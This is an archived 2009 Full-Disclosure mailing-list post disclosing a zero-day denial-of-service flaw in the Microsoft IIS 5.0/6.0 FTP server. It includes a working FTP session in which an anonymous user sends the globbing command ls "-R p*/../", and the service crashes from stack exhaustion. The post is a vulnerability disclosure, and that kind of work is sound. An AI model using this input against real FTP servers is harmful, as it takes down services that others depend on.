lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <72f8221d0909031453p5b67251fo8e96e192ae0723c9@mail.gmail.com>
Date: Thu, 3 Sep 2009 23:53:52 +0200
From: Kingcope <kcope2@...glemail.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Microsoft Internet Information Services 5.0/6.0
	FTP SERVER DENIAL OF SERVICE ("Stack Exhaustion")

***** MS IIS FTPD DoS ZER0DAY *****

There is a DoS vulnerability in the globbing functionality of IIS FTPD.
Anonymous users can exploit this if they have read access to a directory!!!
Normal users can exploit this too if they can read a directory.

Example session where the anonymous user has read access to the folder "pub":

C:\Users\Nikolaos>ftp 192.168.2.102
Verbindung mit 192.168.2.102 wurde hergestellt.
220 Microsoft FTP Service
Benutzer (192.168.2.102:(none)): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Kennwort:
230 Anonymous user logged in.
ftp> ls "-R p*/../"
...
p*/../pub:
pub
...
p*/../pub:
pub
...
p*/../pub:
pub
...
p*/../pub:
pub
...
Verbindung beendet durch Remotehost. (MEANS: Remote Host has closed
the connection)
ftp>
ftp>

By looking into my debugging session with OllyDbg I see that an
exception is raised and
the ftp service crashes due to a "stack overflow", what is a stack exhaustion.
If the ftp service is set to "manual" startup in services control
manager the service
needs to be restarted manually.
IIS 5.0 and 6.0 were tested and are affected.

Best Regards,

Nikolaos Rangos

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ